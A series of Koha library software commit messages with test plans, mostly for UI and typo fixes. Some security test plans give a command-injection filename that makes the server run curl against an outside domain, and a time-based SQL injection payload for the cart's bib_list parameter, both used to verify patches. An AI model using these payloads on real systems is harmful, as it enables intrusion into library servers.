Linking an authority subfield to an authorized value just leaves a blank
in the form rather than creating a <select>, because there's a stray cud-
in the type returned from build_authorized_values_list.
Test plan:
1. Without the patch, Administration - Authority types - Actions menu for
Default - MARC Structure
2. Actions menu for 040 - Subfields
3. Edit subfields - Tab b - Authorized value - set to LANG - Save changes
4. Authorities - New authority - Default
5. In 040 tag, click CATALOGING SOURCE to expand the tag
6. Note that subfield b has a blank space rather than a dropdown menu
7. Apply patch, restart_all
8. Authorities - New authority - Default
9. In 040 tag, click CATALOGING SOURCE to expand the tag
10. Note that subfield b has a dropdown menu listing language names
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
1. In Administration - Patron attribute types verify you have the default
SHOW_BCODE using the YES_NO authorized value
2. Tools - Batch patron modification, add a patron card number or
borrowernumber and continue
3. For Patron attribute select Show barcode on the summary screen item
listings, and note that you get a blank text input rather than a select
menu with Yes and No choices
4. Apply patch, restart_all
5. Repeat step 2 and 3, but note that you now get a Yes/No select menu
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Adjust aqbudgets.pl and currency.pl to check for the correct op value
To test:
Part 1 - Delete a fund
1. Go to Acquisitions > Funds
2. Try to delete a fund
--> Confirmation page shows fund name as '' and fund amount as 0.00
3. Click "Yes, delete this fund"
--> The fund is still there
Part 2 - Delete a currency
3. Go to Acquisitions > Currencies
4. Try to delete a currency
--> Confirmation shows empty values for currency and rate
5. Click, "Yes, delete this currency"
--> An error message appears and the currency is not deleted
6. Apply patch and restart_all
7. Repeat steps 1-5
--> Confirmation pages display correct information, and deletions
occur successfully
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
The scripts for managing both bib and authority frameworks are now expecting
an op 'cud-delete_confirm' but delete_confirm isn't cud, it's just a GET of a
page asking if you are sure. The scripts just need to expect the op they are
actually getting, delete_confirm.
Test plan:
1. Administration - MARC bibliographic framework - New framework
2. Give the framework any code and description and Submit
3. Actions menu for your new framework - Delete
4. Note the message says 'Confirm deletion of framework '' ()?" rather than
having the code and description included.
5. Click Yes, note that deleting failed
6. Administration - Authority types - New authority type
7. Give the authority type any type and description and Submit
8. Actions menu for your authority type - Delete
9. Note the message again says '' () rather than 'desc' (FOO)
10. Click yes, note that deleting failed
11. Finally! Apply patch, reset_all
12. Repeat steps 1-10, this time noting that you get 'desc' (FOO) rather than
'' (), and that deleting works.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test:
1. Go to Acquisitions > EDI Accounts
2. Create an EDI account if one is not already there
3. Try to delete the EDI account
--> Page refreshes and nothing happens
4. Apply patch, restart_all, and refresh the page
5. Try to delete the EDI account again
--> A confirmation page displays with correct information
6. Click "Yes, delete"
--> The EDI account is deleted
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
For reasons unknown, GetOptions is inserting an empty string into the letter_code list. If you are running the script with a letter code filter, the empty string is added to the OR so it functions. If no letter_code is passed, the search requires the letter code to be an empty string, which will of course fail. Even more perplexing is that this does not happen for the type list which is essentially identical code.
Test Plan:
1) Generate some messages in the message queue
2) Run `process_message_queue.pl -v -c`
3) Note nothing happens
4) Apply this patch
5) Repeat step 2
6) Messages are sent!
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This removes the MySQLism for FIELD(..).
In this case we just want to get the non-default records in
the front. So we can just test lang=default. And prevent inserting
$lang in the expression. And so prevent execution in ORDER BY.
No longer needing the ->quote call too.
Test plan:
Run Koha/AdditionalContents.t again.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
Run Koha/AdditionalContents.t without next patch.
Should fail on the sleep execution.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Same change.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Test plan:
Try to access opac-page.pl with a language not in OPACLanguages.
Verify that this 'language' was not passed to sql. Simplest perhaps
by debugging AdditionalContent.pm. Something like:
sub translated_content {
my ( $self, $lang ) = @_;
+warn "L137: $lang";
Now have a public additional_contents page and hit it:
/cgi-bin/koha/opac-page.pl?page_id=5&language=badsql
Check your log and find:
[2024/05/16 07:25:53] [WARN] L137: en at [etc] line 137.
So badsql was caught.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip'
Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no no remote execution occurs
7/ Test uploading actual zip file and images still works
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Actually in _get_tt_params
The following query will delay the response
SELECT `me`.`biblionumber`, `me`.`frameworkcode`, `me`.`author`, `me`.`title`, `me`.`medium`, `me`.`subtitle`, `me`.`part_number`, `me`.`part_name`, `me`.`unititle`, `me`.`notes`, `me`.`serial`, `me`.`seriestitle`
, `me`.`copyrightdate`, `me`.`timestamp`, `me`.`datecreated`, `me`.`abstract`
FROM `biblio` `me`
WHERE `biblionumber` = '1) AND (SELECT 1 FROM (SELECT(SLEEP(6)))x)-- -'
ORDER BY field( biblionumber, 1 ) AND (
SELECT 1
FROM
SELECT SLEEP( 6 ) x
) -- - )
To test
1/ Add some items to your cart in the opac
2/ Choose send cart
3/ Open firefox developer tools and switch to the network tab
4/ Send cart
5/ In the network tab, find the post request and choose copy as curl
6/ Edit the curl command to add )+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+- to the bib_list parameter
7/ Run the curl notice it takes a long time to respond, if you want to check run the curl without the above part added
8/ Apply the patch and restart plack
9/ Run the modified curl and notice no longer the slow down
10/ Test in browser and make sure the basket is still sent
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Victor Grousset/tuxayo <victor@tuxayo.net>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch refactors checkpw_internal to remove the SQL code, use patron ojbects, and return the
patron that correctly matches the userid/caerdnumber when auth is successful
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This patch moves some patron fetching code in C4/Auth to use to patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc) if we didn't authenticate
To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
http://localhost:8080/api/v1/auth/password/validation
with data:
{ "identifier": "BANANA", "password":"Password1" }
and:
{ "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
6 - Repeat the API and confirm you get the correct patron for the password submitted
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
This test is useless it seems, it is not testing background jobs
behaviour.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We usually test if C4::Context->userenv, so we need to undef when
unsetting, not {} (evaluated true)
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern in Koha::Database
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Same pattern, remove dbh stack
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We are not using it and it's confusing, let's remove the context stack.
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
TODO - better review C4::Auth's changes. Are all the removal of
_new_userenv correct/enough?
Signed-off-by: Julian Maurice <julian.maurice@biblibre.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
To test;
1. Go to circ/circulation.pl and check an item out to a patron.
2. Backdate it to sometime in the past using the "Specify due date
(MM/DD/YYYY) : " input
3. A modal appears to "Please confirm checkout". The date is no longer
populated in that field.
4. You must add the date again here.
5. APPLY PATCH
6. Try again and this time the confimration date should be set
correctly.
7. Follow the test plan from Bug 18885 to make sure on site checkouts
still work correctly.
Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
We're copying permissions not settings here, so it makes sense to make
that clear in the wording.
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch moves the 'PlaceHoldsOnOrdersFromSuggestions' system preferences
from the Acquisitions->Printing section to the Circulation->Holds Policy section.
To test:
1) Go to Admin->System Preferences and search for 'PlaceHoldsOnOrdersFromSuggestions'
2) Note that it is located in the Acquisitions prefs, under the Printing subheading
3) Apply patch
4) search for the preferences again
5) Note that it is now located in the Circulation preferences under the Holds Policy subheading
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Emily Lamancusa <emily.lamancusa@montgomerycountymd.gov>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This patch updates the comments of course_items.location and
course_items.enabled to say "reserve" instead of "reseve".
To test in ktd:
- sudo koha-mysql kohadev
- Run: "SHOW CREATE TABLE course_items;"
- Verify the comments of "location" and "enabled" contains
"reseve" instead of "reserve"
- Make a note of the definitions of these two columns
- Run the atomicupdate: "sudo koha-upgrade-schema kohadev"
- Log into the database again and run the same command as above
- Verify the comments now say "reserve" instead of "reseve"
- Make sure the column definitions are otherwise identical to
the ones you saw before the upgrade. Only the spelling of
"reserve" in the comment should be changed.
Signed-off-by: David Nind <david@davidnind.com>
Removed unnecessary line of debug output. 2024-06-10 Magnus Enger
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep 'reseve'. Notice there are instances of 'reseve'
2. Apply patch
3. Repeat step 1, there should be no instances of 'reseve'
Sponsored-by: Catalyst IT, New Zealand
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Test plan:
1. git grep -n -E 'barocode|preproccess' to find the files and line # of typos
2. Apply the patch
3. git grep -E 'barocode|proccess'
4. See no results
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
This makes the hint when entering an SMS number on the OPAC messaging
settings page the same as the staff interface hint: "Please enter
numbers only. Prefix the number with + or 00 if including the country
code." For some countries using either +XX or 00XX are accepted,
for example: +49 or 0049.
Test plan:
1. Set the SMSSendDriver system preference to Email
2. View the current hint for entering an SMS number in the staff
interface:
2.1 Go to Patrons > + New patron > Patron.
2.2 Scroll down to the 'Patron messaging preferences' section at the
end of the page.
2.3 Note that the hint is "Please enter numbers only. Prefix the
number with + or 00 if including the country code.".
3. View the current hint for entering an SMS number in the OPAC:
3.1 Go to the OPAC > Your account (log in if required).
3.2 Select the 'Messaging' tab/section.
3.3 Note that the hint is "Please enter numbers only. Prefix the
number with + if including the country code.".
3.4 The difference: "..or 00.." is missing.
4. Apply the patch.
5. Refresh the OPAC messaging page.
6. The hint text for the OPAC is now the same as the staff interface.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Sam Lau <samalau@gmail.com>
Signed-off-by: Matt Blenkinsop <matt.blenkinsop@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
The date field for patron attributes is now repeatable (enhancement made
in Koha 24.05 with bug 32610). This updates the hint text to reflect
the change.
Test plan:
1. Go to add a patron attribute (Administration > Patrons and
circulation > Patron attribute types > + New patron attribute type )
2. Note that the hint for the "Is a date" field says "...Date attributes
cannot be repeatable or linked to an authorised value category.".
3. Apply the patch.
4. Reload the page.
5. Note that the hint now says "...Date attributes are repeatable,
but cannot be linked to an authorised value category."
6. Sign off D:
PA amended: 'are repeatable' -> 'can be repeatable'
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Update the error message for the web installer onboarding
section when creating the Koha administrator patron (where
the card number or username already exists):
- Fix capitalization
- Use the same label in the error message as used in
the form
Error message before: The patron has not been created!
Card number or Userid may already exist.
Error message after: The patron was not created! The
card number or username already exists.
Test plan:
1. Option 1:
1.1 Review the diff for the patch and make sure that
the updated text makes sense.
. Previous text: The patron has not been created!
Card number or Userid may already exist.
. Updated text: The patron was not created! The
card number or username already exists.
OR
2. Option 2:
2.1 Access the database server:
mysql -uroot -ppassword -hkoha-db-1
2.2 Drop the koha_kohadev database:
drop database koha_kohadev;
2.3 Create the database: create database koha_kohadev;
2.4 Add privileges (for a real installation this would
be limited):
grant all on koha_kohadev.* to koha_kohadev;
2.5 Restart everything (there may be some errors listed):
flush_memcached and then restart_all
2.6 Access the web installer: go to 127.0.0.1:8081
2.7 Use the database user name and password: get from
/etc/koha/sites/kohadev/koha-conf.xml
(default: koha_kohadev, password)
2.8 Continue through the installation process until you
reach 'Selecting default settings':
. Make appropriate selections to use all the sample
data options and settings
2.9 For the 'Onboarding' step - Create Koha
administrator patron:
. Surname: Acevedo
. First name: Henry
. Card number: make up a number that doesn't exist in
the sample date, for example: 741852963
. Library: Centerville
. Patron category: Staff
. Username: 23529000035676 (this is an existing
value already in the sample data)
. Password: a valid password, for example:
KohaCon2024
. Confirm password: repeat password used
. Submit
==> Error message before patch: The patron has not
been created! Card number or Userid may
already exist.
2.10 Apply the patch.
2.11 Repeat step 2.9
2.12 The error message is now: The patron was not created!
The card number or username already exists.
3. Sign off.
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
In the Item search the librarian is allowed, in the first step, to define
additional filters like Title, Author, Publisher, Publication date etc.
(in the third fieldset). This works fine but only for one criterion.
If one adds two or more criteria, the filter does not apply at all.
Test plan
=========
1. Make an Item search with the Pulblisher filter. Put
%University of California% as the value.
You should get 5 rows (with standard ktd test data set), three
from 1982, and two from 1988.
2. Edit search -> add the second criterion: AND Publication date is 1982.
You would expect three rows but you get 900+ rows.
3. Apply the patch; restart_all.
4. Repeat p. 2. You should get the expected three rows.
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Fix a spelling error in the opacreadinghistory system preference
description - 'itms' to 'items'.
Test plan:
1. In the staff interface view the description for the
opacreadinghistory system preferences (Koha administration >
System preferences > search for opacreadinghistory).
2. Note that it reads "Allow patrons to see what itms they have
checked out in the past."
3. Apply the patch.
4. Refresh the page.
5. Note that 'itms' is now spelt correctly as 'items'.
6. Sign off.
Signed-off-by: Laura Escamilla <laura.escamilla@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
If you enabled AutoLocation and have a branch without ip, this
triggers warnings.
Test plan:
Check logs in this situation with/without this patch by logging out
and in again on staff.
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
